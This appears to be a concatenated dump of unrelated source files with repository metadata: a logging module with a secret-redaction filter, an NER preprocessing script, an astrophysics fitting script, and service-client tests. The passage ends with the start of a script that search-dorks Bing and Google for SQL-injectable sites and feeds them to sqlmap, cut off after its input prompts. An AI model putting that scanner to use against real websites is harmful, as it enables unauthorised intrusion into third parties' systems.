# for salt.log.setup.LOGGING_*_HANDLER", flh.count)
def filter_logs(opts_to_log, remove_dots=True):
"""
Filters out keys containing certain patterns to avoid sensitive information being sent to logs
Works on dictionaries and lists
This function was located at extmods/modules/conf_publisher.py previously
"""
filtered_conf = _remove_sensitive_info(opts_to_log, PATTERNS_TO_FILTER)
if remove_dots:
for key in filtered_conf.keys():
if '.' in key:
filtered_conf[key.replace('.', '_')] = filtered_conf.pop(key)
return filtered_conf
def _remove_sensitive_info(obj, patterns_to_filter):
"""
Filter known sensitive info
"""
if isinstance(obj, dict):
obj = {
key: _remove_sensitive_info(value, patterns_to_filter)
for key, value in obj.items()
if not any(patt in key for patt in patterns_to_filter)}
elif isinstance(obj, list):
obj = [_remove_sensitive_info(item, patterns_to_filter)
for item in obj]
return obj
| 28.943231
| 99
| 0.664152
|
import logging
import time
import hubblestack.splunklogging
PATTERNS_TO_FILTER = ["password", "token", "passphrase", "privkey",
"keyid", "s3.key", "splunk_token"]
SPLUNK = logging.SPLUNK = 25
PROFILE = logging.PROFILE = 15
TRACE = logging.TRACE = 5
GARBAGE = logging.GARBAGE = 1
QUIET = logging.QUIET = 1000
LOG_LEVELS = {
'all': logging.NOTSET,
'debug': logging.DEBUG,
'error': logging.ERROR,
'critical': logging.CRITICAL,
'garbage': GARBAGE,
'info': logging.INFO,
'profile': PROFILE,
'quiet': QUIET,
'trace': TRACE,
'warning': logging.WARNING,
}
logging.addLevelName(SPLUNK, 'SPLUNK')
logging.addLevelName(QUIET, 'QUIET')
logging.addLevelName(PROFILE, 'PROFILE')
logging.addLevelName(TRACE, 'TRACE')
logging.addLevelName(GARBAGE, 'GARBAGE')
def _splunk(self, message, *args, **kwargs):
if self.isEnabledFor(logging.SPLUNK):
self._log(logging.SPLUNK, message, args, **kwargs)
def _quiet(self, message, *args, **kwargs):
if self.isEnabledFor(logging.QUIET):
self._log(logging.QUIET, message, args, **kwargs)
def _profile(self, message, *args, **kwargs):
if self.isEnabledFor(logging.PROFILE):
self._log(logging.PROFILE, message, args, **kwargs)
def _trace(self, message, *args, **kwargs):
if self.isEnabledFor(logging.TRACE):
self._log(logging.TRACE, message, args, **kwargs)
def _garbage(self, message, *args, **kwargs):
if self.isEnabledFor(logging.GARBAGE):
self._log(logging.GARBAGE, message, args, **kwargs)
logging.Logger.splunk = _splunk
logging.Logger.quiet = _quiet
logging.Logger.profile = _profile
logging.Logger.trace = _trace
logging.Logger.garbage = _garbage
SPLUNK_HANDLER = None
class MockRecord(object):
def __init__(self, message, levelname, asctime, name):
self.message = message
self.levelname = levelname
self.asctime = asctime
self.name = name
# Will be removed when we set up the console or file logger.
TEMP_HANDLER = logging.StreamHandler()
TEMP_HANDLER.setLevel(logging.INFO)
TEMP_HANDLER.setFormatter(logging.Formatter('%(asctime)s %(levelname)s %(name)s: %(message)s'))
logging.root.handlers.insert(0, TEMP_HANDLER)
def _remove_temp_handler():
if TEMP_HANDLER and TEMP_HANDLER in logging.root.handlers:
logging.root.handlers.remove(TEMP_HANDLER)
def setup_console_logger(log_level='error',
log_format='%(asctime)s [%(levelname)-5s] %(message)s',
date_format='%H:%M:%S'):
_remove_temp_handler()
rootlogger = logging.getLogger()
handler = logging.StreamHandler()
handler.setLevel(LOG_LEVELS.get(log_level, logging.ERROR))
formatter = logging.Formatter(log_format, date_format)
handler.setFormatter(formatter)
rootlogger.addHandler(handler)
def setup_file_logger(log_file,
log_level='error',
log_format='%(asctime)s,%(msecs)03d [%(levelname)-5s] [%(name)s:%(lineno)d] '
' %(message)s',
date_format='%Y-%m-%d %H:%M:%S',
max_bytes=100000000,
backup_count=1):
_remove_temp_handler()
rootlogger = logging.getLogger()
handler = logging.handlers.RotatingFileHandler(log_file, maxBytes=max_bytes,
backupCount=backup_count)
handler.setLevel(LOG_LEVELS.get(log_level, logging.ERROR))
formatter = logging.Formatter(log_format, date_format)
handler.setFormatter(formatter)
rootlogger.addHandler(handler)
def setup_splunk_logger():
_remove_temp_handler()
rootlogger = logging.getLogger()
handler = hubblestack.splunklogging.SplunkHandler()
handler.setLevel(logging.SPLUNK)
rootlogger.addHandler(handler)
global SPLUNK_HANDLER
SPLUNK_HANDLER = handler
def emit_to_splunk(message, level, name):
if isinstance(message, (list, dict)):
message = filter_logs(message, remove_dots=False)
if SPLUNK_HANDLER is None:
return False
handler = SPLUNK_HANDLER
handler.emit(MockRecord(message, level, time.asctime(), name))
return True
def workaround_salt_log_handler_queues():
class _FakeLogHandler(object):
level = 10
count = 0
def handle(self, _record):
self.count += 1
flh = _FakeLogHandler()
import salt.log.setup as sls
sls.LOGGING_STORE_HANDLER.sync_with_handlers([flh])
sls.LOGGING_NULL_HANDLER.sync_with_handlers([flh])
# if flh.count > 0:
# log.info("pretended to handle %d logging record(s)
# for salt.log.setup.LOGGING_*_HANDLER", flh.count)
def filter_logs(opts_to_log, remove_dots=True):
filtered_conf = _remove_sensitive_info(opts_to_log, PATTERNS_TO_FILTER)
if remove_dots:
for key in filtered_conf.keys():
if '.' in key:
filtered_conf[key.replace('.', '_')] = filtered_conf.pop(key)
return filtered_conf
def _remove_sensitive_info(obj, patterns_to_filter):
if isinstance(obj, dict):
obj = {
key: _remove_sensitive_info(value, patterns_to_filter)
for key, value in obj.items()
if not any(patt in key for patt in patterns_to_filter)}
elif isinstance(obj, list):
obj = [_remove_sensitive_info(item, patterns_to_filter)
for item in obj]
return obj
| true
| true
|
790c8de998b51f0c481a10acc216410fd391a3c0
| 502
|
py
|
Python
|
Fine-tuning/Utility Files/wikiann_preprocessor.py
|
Vaidehi99/OBPE
|
e844c3268d3d698eeca96cd2646441601474155b
|
[
"Apache-2.0"
] | null | null | null |
Fine-tuning/Utility Files/wikiann_preprocessor.py
|
Vaidehi99/OBPE
|
e844c3268d3d698eeca96cd2646441601474155b
|
[
"Apache-2.0"
] | null | null | null |
Fine-tuning/Utility Files/wikiann_preprocessor.py
|
Vaidehi99/OBPE
|
e844c3268d3d698eeca96cd2646441601474155b
|
[
"Apache-2.0"
] | null | null | null |
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("--infile", default=None, type=str, required=True, help="path of input file to preprocess")
parser.add_argument("--outfile", default=None, type=str, required=True,help="output file path")
args = parser.parse_args()
lines=open(args.infile,'r').readlines()
outfile=open(args.outfile,'w')
for line in lines:
if(len(line.split(' '))==0):
outfile.write('\n')
else:
outfile.write(line.split(' ')[0]+'\t'+line.split(' ')[-1])
| 31.375
| 111
| 0.699203
|
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("--infile", default=None, type=str, required=True, help="path of input file to preprocess")
parser.add_argument("--outfile", default=None, type=str, required=True,help="output file path")
args = parser.parse_args()
lines=open(args.infile,'r').readlines()
outfile=open(args.outfile,'w')
for line in lines:
if(len(line.split(' '))==0):
outfile.write('\n')
else:
outfile.write(line.split(' ')[0]+'\t'+line.split(' ')[-1])
| true
| true
|
790c8eadf2fdde222a7edbfa4ff632907727f155
| 2,970
|
py
|
Python
|
Software/Funcionales/funciones_LambdaCDM_AGN.py
|
matiasleize/tesis_licenciatura
|
5df6e341314583702b466b8ed7977d410f0ee457
|
[
"MIT"
] | null | null | null |
Software/Funcionales/funciones_LambdaCDM_AGN.py
|
matiasleize/tesis_licenciatura
|
5df6e341314583702b466b8ed7977d410f0ee457
|
[
"MIT"
] | null | null | null |
Software/Funcionales/funciones_LambdaCDM_AGN.py
|
matiasleize/tesis_licenciatura
|
5df6e341314583702b466b8ed7977d410f0ee457
|
[
"MIT"
] | null | null | null |
"""
Created on Sun Feb 2 13:28:48 2020
@author: matias
"""
import numpy as np
from numpy.linalg import inv
from matplotlib import pyplot as plt
import time
import camb
from scipy.integrate import cumtrapz as cumtrapz
from scipy.integrate import simps as simps
from scipy.interpolate import interp1d
from scipy.constants import c as c_luz #metros/segundos
c_luz_km = c_luz/1000
import sys
import os
from os.path import join as osjoin
from pc_path import definir_path
path_git, path_datos_global = definir_path()
os.chdir(path_git)
sys.path.append('./Software/Funcionales/')
from funciones_int import Hubble_teorico
from funciones_AGN import zs_2_logDlH0
#%%
'''
DEPRECATED: Antes de eliminar este archivo copiar este ejemplo en otro .py
en donde se grafiquen los datos.
'''
if __name__ == '__main__':
from scipy.constants import c as c_luz #metros/segundos
from matplotlib import pyplot as plt
import sys
import os
from os.path import join as osjoin
from pc_path import definir_path
path_git, path_datos_global = definir_path()
os.chdir(path_git)
sys.path.append('./Software/Funcionales/')
from funciones_data import leer_data_AGN
#%%
def leer_data_AGN(archivo_AGN):
z, Fuv, eFuv, Fx, eFx = np.loadtxt(archivo_AGN,
usecols=(3,4,5,6,7), unpack=True)
arr1inds = z.argsort()
sorted_z = z[arr1inds]
sorted_Fuv = Fuv[arr1inds]
sorted_eFuv = eFuv[arr1inds]
sorted_Fx = Fx[arr1inds]
sorted_eFx = eFx[arr1inds]
return sorted_z, sorted_Fuv, sorted_eFuv, sorted_Fx, sorted_eFx
#Data AGN
os.chdir(path_git+'/Software/Estadística/Datos/Datos_AGN')
data_agn = leer_data_AGN('table3.dat')
H_0 = 70
omega_m = 0.99
gamma = 0.64
beta = 7
delta = 0.3
theta = [omega_m,beta,gamma,delta]
#params_to_chi2_AGN_nuisance(theta, _, data_agn)/(len(z_data)-4)
data_agn = leer_data_AGN('table3.dat')
z_data_1, logFuv_1, eFuv_1, logFx_1, eFx_1 = data_agn
zmin = 0
zmax = 100
mask = (z_data_1 > zmin) & (z_data_1 < zmax)
z_data = z_data_1[mask]
logFuv = logFuv_1[mask]
logFx = logFx_1[mask]
eFx = eFx_1[mask]
eFuv = eFuv_1[mask]
zs_modelo = np.linspace(0,30,10**6)
Dl_teo = -np.log10(H_0) + zs_2_logDlH0(zs_modelo,omega_m,z_data)
Dl_teo_cm = Dl_teo - np.log10(3.24) + 25
psi = beta + gamma * logFuv + 2 * (gamma-1) * (Dl_teo_cm + 0.5 * np.log10(4*np.pi))
si_2 = eFx**2 + (gamma * eFuv)**2 + np.exp(2*np.log(delta)) #El cuadrado de los errores
#si_2 = eFx**2 + (gamma * eFuv)**2 + delta**2 #El cuadrado de los errores
print(np.sum(si_2))
chi2_AGN = np.sum( ((logFx-psi)**2/si_2) + np.log(2*np.pi*si_2)) # menos en el paper
print(chi2_AGN)
print(chi2_AGN/(len(z_data)-4))
plt.figure()
plt.xlabel('z (redshift)')
plt.ylabel(r'$Fx$')
plt.errorbar(z_data,psi,np.sqrt(si_2),marker='.',linestyle='')
plt.plot(z_data,logFx,'.r')
| 28.557692
| 91
| 0.676431
|
import numpy as np
from numpy.linalg import inv
from matplotlib import pyplot as plt
import time
import camb
from scipy.integrate import cumtrapz as cumtrapz
from scipy.integrate import simps as simps
from scipy.interpolate import interp1d
from scipy.constants import c as c_luz
c_luz_km = c_luz/1000
import sys
import os
from os.path import join as osjoin
from pc_path import definir_path
path_git, path_datos_global = definir_path()
os.chdir(path_git)
sys.path.append('./Software/Funcionales/')
from funciones_int import Hubble_teorico
from funciones_AGN import zs_2_logDlH0
if __name__ == '__main__':
from scipy.constants import c as c_luz
from matplotlib import pyplot as plt
import sys
import os
from os.path import join as osjoin
from pc_path import definir_path
path_git, path_datos_global = definir_path()
os.chdir(path_git)
sys.path.append('./Software/Funcionales/')
from funciones_data import leer_data_AGN
def leer_data_AGN(archivo_AGN):
z, Fuv, eFuv, Fx, eFx = np.loadtxt(archivo_AGN,
usecols=(3,4,5,6,7), unpack=True)
arr1inds = z.argsort()
sorted_z = z[arr1inds]
sorted_Fuv = Fuv[arr1inds]
sorted_eFuv = eFuv[arr1inds]
sorted_Fx = Fx[arr1inds]
sorted_eFx = eFx[arr1inds]
return sorted_z, sorted_Fuv, sorted_eFuv, sorted_Fx, sorted_eFx
os.chdir(path_git+'/Software/Estadística/Datos/Datos_AGN')
data_agn = leer_data_AGN('table3.dat')
H_0 = 70
omega_m = 0.99
gamma = 0.64
beta = 7
delta = 0.3
theta = [omega_m,beta,gamma,delta]
data_agn = leer_data_AGN('table3.dat')
z_data_1, logFuv_1, eFuv_1, logFx_1, eFx_1 = data_agn
zmin = 0
zmax = 100
mask = (z_data_1 > zmin) & (z_data_1 < zmax)
z_data = z_data_1[mask]
logFuv = logFuv_1[mask]
logFx = logFx_1[mask]
eFx = eFx_1[mask]
eFuv = eFuv_1[mask]
zs_modelo = np.linspace(0,30,10**6)
Dl_teo = -np.log10(H_0) + zs_2_logDlH0(zs_modelo,omega_m,z_data)
Dl_teo_cm = Dl_teo - np.log10(3.24) + 25
psi = beta + gamma * logFuv + 2 * (gamma-1) * (Dl_teo_cm + 0.5 * np.log10(4*np.pi))
si_2 = eFx**2 + (gamma * eFuv)**2 + np.exp(2*np.log(delta))
chi2_AGN = np.sum( ((logFx-psi)**2/si_2) + np.log(2*np.pi*si_2))
print(chi2_AGN)
print(chi2_AGN/(len(z_data)-4))
plt.figure()
plt.xlabel('z (redshift)')
plt.ylabel(r'$Fx$')
plt.errorbar(z_data,psi,np.sqrt(si_2),marker='.',linestyle='')
plt.plot(z_data,logFx,'.r')
| true
| true
|
790c8fb53feaa528655dc48d7224c7c5ffda0117
| 7,725
|
py
|
Python
|
services/director-v2/tests/unit/test_modules_director_v0.py
|
GitHK/osparc-simcore-forked
|
5b01a28d1b8028afcf9a735e1d46a73daa13686e
|
[
"MIT"
] | null | null | null |
services/director-v2/tests/unit/test_modules_director_v0.py
|
GitHK/osparc-simcore-forked
|
5b01a28d1b8028afcf9a735e1d46a73daa13686e
|
[
"MIT"
] | 17
|
2020-10-15T16:06:05.000Z
|
2022-03-21T18:48:21.000Z
|
services/director-v2/tests/unit/test_modules_director_v0.py
|
GitHK/osparc-simcore-forked
|
5b01a28d1b8028afcf9a735e1d46a73daa13686e
|
[
"MIT"
] | null | null | null |
# pylint:disable=unused-variable
# pylint:disable=unused-argument
# pylint:disable=redefined-outer-name
# pylint:disable=protected-access
import json
import re
import urllib.parse
from collections import namedtuple
from pathlib import Path
from random import randint
from typing import Callable, List
from uuid import uuid4
import pytest
import respx
from fastapi import FastAPI, status
from models_library.services import ServiceDockerData, ServiceKeyVersion
from simcore_service_director_v2.models.schemas.services import (
RunningServiceDetails,
ServiceExtras,
)
from simcore_service_director_v2.modules.director_v0 import DirectorV0Client
@pytest.fixture(autouse=True)
def minimal_director_config(project_env_devel_environment, monkeypatch):
"""set a minimal configuration for testing the director connection only"""
monkeypatch.setenv("DIRECTOR_ENABLED", "1")
monkeypatch.setenv("POSTGRES_ENABLED", "0")
monkeypatch.setenv("CELERY_ENABLED", "0")
monkeypatch.setenv("REGISTRY_ENABLED", "0")
@pytest.fixture
def mocked_director_v0_service_api(minimal_app, entrypoint, exp_data, resp_alias):
with respx.mock(
base_url=minimal_app.state.settings.director_v0.base_url(include_tag=False),
assert_all_called=False,
assert_all_mocked=True,
) as respx_mock:
# lists services
respx_mock.get(
urllib.parse.unquote(entrypoint),
content=exp_data,
alias=resp_alias,
)
yield respx_mock
ForwardToDirectorParams = namedtuple(
"ForwardToDirectorParams", "entrypoint,exp_status,exp_data,resp_alias"
)
def _get_list_services_calls() -> List[ForwardToDirectorParams]:
return [
ForwardToDirectorParams(
entrypoint="/v0/services",
exp_status=status.HTTP_200_OK,
exp_data={"data": ["service1", "service2"]},
resp_alias="list_all_services",
),
ForwardToDirectorParams(
entrypoint="/v0/services?service_type=computational",
exp_status=status.HTTP_200_OK,
exp_data={"data": ["service1", "service2"]},
resp_alias="list_computational_services",
),
ForwardToDirectorParams(
entrypoint="/v0/services?service_type=dynamic",
exp_status=status.HTTP_200_OK,
exp_data={"data": ["service1", "service2"]},
resp_alias="list_dynamic_services",
),
]
def _get_service_version_calls() -> List[ForwardToDirectorParams]:
# TODO: here we see the return value is currently not validated
return [
ForwardToDirectorParams(
entrypoint="/v0/services/simcore%2Fservices%2Fdynamic%2Fmyservice/1.3.4",
exp_status=status.HTTP_200_OK,
exp_data={"data": ["stuff about my service"]},
resp_alias="get_service_version",
)
]
def _get_service_version_extras_calls() -> List[ForwardToDirectorParams]:
# TODO: here we see the return value is currently not validated
return [
ForwardToDirectorParams(
entrypoint="/v0/services/simcore%2Fservices%2Fdynamic%2Fmyservice/1.3.4/extras",
exp_status=status.HTTP_200_OK,
exp_data={"data": "extra stuff about my service"},
resp_alias="get_service_extras",
)
]
@pytest.mark.parametrize(
"entrypoint,exp_status,exp_data,resp_alias",
_get_list_services_calls()
+ _get_service_version_calls()
+ _get_service_version_extras_calls(),
)
def test_forward_to_director(
client, mocked_director_v0_service_api, entrypoint, exp_status, exp_data, resp_alias
):
response = client.get(entrypoint)
assert response.status_code == exp_status
assert response.json() == exp_data
assert mocked_director_v0_service_api[resp_alias].called
@pytest.fixture(scope="session")
def fake_service_details(mocks_dir: Path) -> ServiceDockerData:
fake_service_path = mocks_dir / "fake_service.json"
assert fake_service_path.exists()
fake_service_data = json.loads(fake_service_path.read_text())
return ServiceDockerData(**fake_service_data)
@pytest.fixture
def fake_service_extras(random_json_from_schema: Callable) -> ServiceExtras:
random_extras = ServiceExtras(
**random_json_from_schema(ServiceExtras.schema_json(indent=2))
)
return random_extras
@pytest.fixture
def fake_running_service_details(
random_json_from_schema: Callable,
) -> RunningServiceDetails:
random_data = random_json_from_schema(RunningServiceDetails.schema_json(indent=2))
# fix port stuff, the randomiser does not understand positive ints
KEYS_TO_FIX = ["published_port", "service_port"]
for k in KEYS_TO_FIX:
if k in random_data:
random_data[k] = randint(1, 50000)
random_details = RunningServiceDetails(**random_data)
return random_details
@pytest.fixture
def mocked_director_service_fcts(
minimal_app: FastAPI,
fake_service_details: ServiceDockerData,
fake_service_extras: ServiceExtras,
fake_running_service_details: RunningServiceDetails,
):
with respx.mock(
base_url=minimal_app.state.settings.director_v0.base_url(include_tag=False),
assert_all_called=False,
assert_all_mocked=True,
) as respx_mock:
respx_mock.get(
"/v0/services/simcore%2Fservices%2Fdynamic%2Fmyservice/1.3.4",
content={"data": [fake_service_details.dict(by_alias=True)]},
alias="get_service_version",
)
respx_mock.get(
"/v0/service_extras/simcore%2Fservices%2Fdynamic%2Fmyservice/1.3.4",
content={"data": fake_service_extras.dict(by_alias=True)},
alias="get_service_extras",
)
pattern = re.compile(
r"v0/running_interactive_services/[0-9a-fA-F]{8}-?[0-9a-fA-F]{4}-?[0-9a-fA-F]{4}-?[0-9a-fA-F]{4}-?[0-9a-fA-F]{12}$"
)
respx_mock.get(
pattern,
content={"data": fake_running_service_details.dict(by_alias=True)},
alias="get_running_service_details",
)
yield respx_mock
async def test_get_service_details(
minimal_app: FastAPI,
mocked_director_service_fcts,
fake_service_details: ServiceDockerData,
):
director_client: DirectorV0Client = minimal_app.state.director_v0_client
service = ServiceKeyVersion(
key="simcore/services/dynamic/myservice", version="1.3.4"
)
service_details: ServiceDockerData = await director_client.get_service_details(
service
)
assert mocked_director_service_fcts["get_service_version"].called
assert fake_service_details == service_details
async def test_get_service_extras(
minimal_app: FastAPI,
mocked_director_service_fcts,
fake_service_extras: ServiceExtras,
):
director_client: DirectorV0Client = minimal_app.state.director_v0_client
service = ServiceKeyVersion(
key="simcore/services/dynamic/myservice", version="1.3.4"
)
service_extras: ServiceExtras = await director_client.get_service_extras(service)
assert mocked_director_service_fcts["get_service_extras"].called
assert fake_service_extras == service_extras
async def test_get_running_service_details(
minimal_app: FastAPI,
mocked_director_service_fcts,
fake_running_service_details: RunningServiceDetails,
):
director_client: DirectorV0Client = minimal_app.state.director_v0_client
service_details: RunningServiceDetails = (
await director_client.get_running_service_details(str(uuid4()))
)
assert mocked_director_service_fcts["get_running_service_details"].called
assert fake_running_service_details == service_details
| 33.733624
| 127
| 0.71767
|
import json
import re
import urllib.parse
from collections import namedtuple
from pathlib import Path
from random import randint
from typing import Callable, List
from uuid import uuid4
import pytest
import respx
from fastapi import FastAPI, status
from models_library.services import ServiceDockerData, ServiceKeyVersion
from simcore_service_director_v2.models.schemas.services import (
RunningServiceDetails,
ServiceExtras,
)
from simcore_service_director_v2.modules.director_v0 import DirectorV0Client
@pytest.fixture(autouse=True)
def minimal_director_config(project_env_devel_environment, monkeypatch):
monkeypatch.setenv("DIRECTOR_ENABLED", "1")
monkeypatch.setenv("POSTGRES_ENABLED", "0")
monkeypatch.setenv("CELERY_ENABLED", "0")
monkeypatch.setenv("REGISTRY_ENABLED", "0")
@pytest.fixture
def mocked_director_v0_service_api(minimal_app, entrypoint, exp_data, resp_alias):
with respx.mock(
base_url=minimal_app.state.settings.director_v0.base_url(include_tag=False),
assert_all_called=False,
assert_all_mocked=True,
) as respx_mock:
respx_mock.get(
urllib.parse.unquote(entrypoint),
content=exp_data,
alias=resp_alias,
)
yield respx_mock
ForwardToDirectorParams = namedtuple(
"ForwardToDirectorParams", "entrypoint,exp_status,exp_data,resp_alias"
)
def _get_list_services_calls() -> List[ForwardToDirectorParams]:
return [
ForwardToDirectorParams(
entrypoint="/v0/services",
exp_status=status.HTTP_200_OK,
exp_data={"data": ["service1", "service2"]},
resp_alias="list_all_services",
),
ForwardToDirectorParams(
entrypoint="/v0/services?service_type=computational",
exp_status=status.HTTP_200_OK,
exp_data={"data": ["service1", "service2"]},
resp_alias="list_computational_services",
),
ForwardToDirectorParams(
entrypoint="/v0/services?service_type=dynamic",
exp_status=status.HTTP_200_OK,
exp_data={"data": ["service1", "service2"]},
resp_alias="list_dynamic_services",
),
]
def _get_service_version_calls() -> List[ForwardToDirectorParams]:
return [
ForwardToDirectorParams(
entrypoint="/v0/services/simcore%2Fservices%2Fdynamic%2Fmyservice/1.3.4",
exp_status=status.HTTP_200_OK,
exp_data={"data": ["stuff about my service"]},
resp_alias="get_service_version",
)
]
def _get_service_version_extras_calls() -> List[ForwardToDirectorParams]:
return [
ForwardToDirectorParams(
entrypoint="/v0/services/simcore%2Fservices%2Fdynamic%2Fmyservice/1.3.4/extras",
exp_status=status.HTTP_200_OK,
exp_data={"data": "extra stuff about my service"},
resp_alias="get_service_extras",
)
]
@pytest.mark.parametrize(
"entrypoint,exp_status,exp_data,resp_alias",
_get_list_services_calls()
+ _get_service_version_calls()
+ _get_service_version_extras_calls(),
)
def test_forward_to_director(
client, mocked_director_v0_service_api, entrypoint, exp_status, exp_data, resp_alias
):
response = client.get(entrypoint)
assert response.status_code == exp_status
assert response.json() == exp_data
assert mocked_director_v0_service_api[resp_alias].called
@pytest.fixture(scope="session")
def fake_service_details(mocks_dir: Path) -> ServiceDockerData:
fake_service_path = mocks_dir / "fake_service.json"
assert fake_service_path.exists()
fake_service_data = json.loads(fake_service_path.read_text())
return ServiceDockerData(**fake_service_data)
@pytest.fixture
def fake_service_extras(random_json_from_schema: Callable) -> ServiceExtras:
random_extras = ServiceExtras(
**random_json_from_schema(ServiceExtras.schema_json(indent=2))
)
return random_extras
@pytest.fixture
def fake_running_service_details(
random_json_from_schema: Callable,
) -> RunningServiceDetails:
random_data = random_json_from_schema(RunningServiceDetails.schema_json(indent=2))
KEYS_TO_FIX = ["published_port", "service_port"]
for k in KEYS_TO_FIX:
if k in random_data:
random_data[k] = randint(1, 50000)
random_details = RunningServiceDetails(**random_data)
return random_details
@pytest.fixture
def mocked_director_service_fcts(
minimal_app: FastAPI,
fake_service_details: ServiceDockerData,
fake_service_extras: ServiceExtras,
fake_running_service_details: RunningServiceDetails,
):
with respx.mock(
base_url=minimal_app.state.settings.director_v0.base_url(include_tag=False),
assert_all_called=False,
assert_all_mocked=True,
) as respx_mock:
respx_mock.get(
"/v0/services/simcore%2Fservices%2Fdynamic%2Fmyservice/1.3.4",
content={"data": [fake_service_details.dict(by_alias=True)]},
alias="get_service_version",
)
respx_mock.get(
"/v0/service_extras/simcore%2Fservices%2Fdynamic%2Fmyservice/1.3.4",
content={"data": fake_service_extras.dict(by_alias=True)},
alias="get_service_extras",
)
pattern = re.compile(
r"v0/running_interactive_services/[0-9a-fA-F]{8}-?[0-9a-fA-F]{4}-?[0-9a-fA-F]{4}-?[0-9a-fA-F]{4}-?[0-9a-fA-F]{12}$"
)
respx_mock.get(
pattern,
content={"data": fake_running_service_details.dict(by_alias=True)},
alias="get_running_service_details",
)
yield respx_mock
async def test_get_service_details(
minimal_app: FastAPI,
mocked_director_service_fcts,
fake_service_details: ServiceDockerData,
):
director_client: DirectorV0Client = minimal_app.state.director_v0_client
service = ServiceKeyVersion(
key="simcore/services/dynamic/myservice", version="1.3.4"
)
service_details: ServiceDockerData = await director_client.get_service_details(
service
)
assert mocked_director_service_fcts["get_service_version"].called
assert fake_service_details == service_details
async def test_get_service_extras(
minimal_app: FastAPI,
mocked_director_service_fcts,
fake_service_extras: ServiceExtras,
):
director_client: DirectorV0Client = minimal_app.state.director_v0_client
service = ServiceKeyVersion(
key="simcore/services/dynamic/myservice", version="1.3.4"
)
service_extras: ServiceExtras = await director_client.get_service_extras(service)
assert mocked_director_service_fcts["get_service_extras"].called
assert fake_service_extras == service_extras
async def test_get_running_service_details(
minimal_app: FastAPI,
mocked_director_service_fcts,
fake_running_service_details: RunningServiceDetails,
):
director_client: DirectorV0Client = minimal_app.state.director_v0_client
service_details: RunningServiceDetails = (
await director_client.get_running_service_details(str(uuid4()))
)
assert mocked_director_service_fcts["get_running_service_details"].called
assert fake_running_service_details == service_details
| true
| true
|
790c9459fd20a479a63780067f6e8bbb4410f33b
| 30,755
|
py
|
Python
|
findsqlinj.py
|
ThomasTJdev/python_gdork_sqli
|
9f0254733601b5ead8799cbc8539fdf712db49b5
|
[
"MIT"
] | 58
|
2017-01-23T11:36:29.000Z
|
2022-02-20T16:53:25.000Z
|
findsqlinj.py
|
ThomasTJdev/python_gdork_sqli
|
9f0254733601b5ead8799cbc8539fdf712db49b5
|
[
"MIT"
] | 2
|
2017-01-26T15:14:46.000Z
|
2018-12-29T08:03:43.000Z
|
findsqlinj.py
|
ThomasTJdev/python_gdork_sqli
|
9f0254733601b5ead8799cbc8539fdf712db49b5
|
[
"MIT"
] | 33
|
2017-01-22T01:53:42.000Z
|
2021-12-13T20:47:20.000Z
|
#!/usr/bin/python python3
#
# Python script for finding websites which are prone to SQL injections
# Do crawling on bing or google for possible vuln urls
# Check url with qoute ' and catch error messages
# Run sqlmap against urls
#
# License:
# MIT - (c) 2016 ThomasTJ (TTJ)
#
import sys # Quit the shiat
import os # Working with files and starting sqlmap
import re # Searching web results for vuln
import requests # Calling websites
import urllib.parse # Parsing url encoding for search
import shutil # Checking if SQLmap is installed
import psutil # Checking possible VPN connection
import http.client # Ping to check network connection
import random # Shuffle between user agents
import time # Printing time when scraping and checking urls
from time import sleep # Multiple use cases, e.g. sleep between requests
from bs4 import BeautifulSoup # Working with website date
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
ITALIC = '\x1B[3m'
# Variables which needs to be defined
filenameRawUrl = "0"
filenameVulnUrl = "0"
def LoadUserAgents(uafile="user_agents.txt"):
# uafile : string, path to text file of user agents, one per line
uas = []
with open(uafile, 'rb') as uaf:
for ua in uaf.readlines():
if ua:
uas.append(ua.strip()[1:-1-1])
random.shuffle(uas)
return uas
def inputSearchUrls():
print("\n" + bcolors.HEADER)
print(" #===================================#")
print(" # #")
print(" # Find urls which might is vuln for #")
print(" # SQL injections #")
print(" # #")
print(" #===================================#")
print("\n" + bcolors.ENDC)
print(" Basesearch could be: php?id=, php?cat=, e.g.\n")
# =================================
# Base input
# =================================
# @type basesearch: str
# @param basesearch: Query string. Must NOT be url-encoded.
basesearch = input(" Enter base search string: " + bcolors.OKBLUE)
# @type searchprovider: str
# @param searchprovider: Who should perform the search.
searchprovider = input(bcolors.ENDC + " Bing or Google (b/g): " + bcolors.OKBLUE)
if searchprovider.lower() not in ('b', 'g'):
print(bcolors.WARNING + " - Wrong input - only 'b' and 'g' allowed. Using 'b'")
searchprovider = 'b'
# @type maxperpage: int/str (changed to string)
# @param maxperpage: Max results returned per page
maxperpage = input(bcolors.ENDC + " Results per page: " + bcolors.OKBLUE)
if not maxperpage.isdigit():
print(bcolors.WARNING + " - Wrong input - only numeric values allowed. Using 20")
maxperpage = 20
# @type maxpages: int
# @param maxpages: Max pages to loop through
maxpages = input(bcolors.ENDC + " Number of pages: " + bcolors.OKBLUE)
if not maxpages.isdigit():
print(bcolors.WARNING + " - Wrong input - only numeric values allowed. Using 10")
maxpages = 10
# @type startpage: int
# @param startpage: First page to look in
startpage = input(bcolors.ENDC + " Start pages: " + bcolors.OKBLUE)
if not startpage.isdigit():
print(bcolors.WARNING + " - Wrong input - only numeric values allowed. Using 0")
startpage = 0
if int(startpage) > 0:
startpage = (int(startpage) - 1)
# @type timeout: int
# @param timeout: Sleep between request
timeout = input(bcolors.ENDC + " Enter pause between requests: " + bcolors.OKBLUE)
if not timeout.isdigit():
print(bcolors.WARNING + " - Wrong input - only numeric values allowed. Using 6")
timeout = 6
# @type savesearch: str
# @param savesearch: Save the shiat to a file
savesearch = input(bcolors.ENDC + " Save search (y/N): " + bcolors.OKBLUE)
if savesearch.lower() not in ('', 'y', 'n'):
print(bcolors.WARNING + " - Wrong input - only 'y' and 'n' allowed. Using 'n'")
savesearch = 'n'
# @type filename: str
# @param filename: Filename for file containing the search results
if savesearch.lower() == "y":
filename = input(bcolors.ENDC + " Filename for search: " + bcolors.OKBLUE)
if not os.path.isfile(filename):
os.mknod(filename)
else:
appendtofile = input(bcolors.ENDC + " File exists, append (Y/n): " + bcolors.OKBLUE)
if appendtofile == "n":
print(bcolors.WARNING + " - User disallowed appending to resultfile")
print(bcolors.WARNING + " - Please try again with another filename")
print(bcolors.WARNING + " - Exiting")
sys.exit()
else:
filename = ""
filename = "tmpurllist"
# =================================
# Make variables ready to use
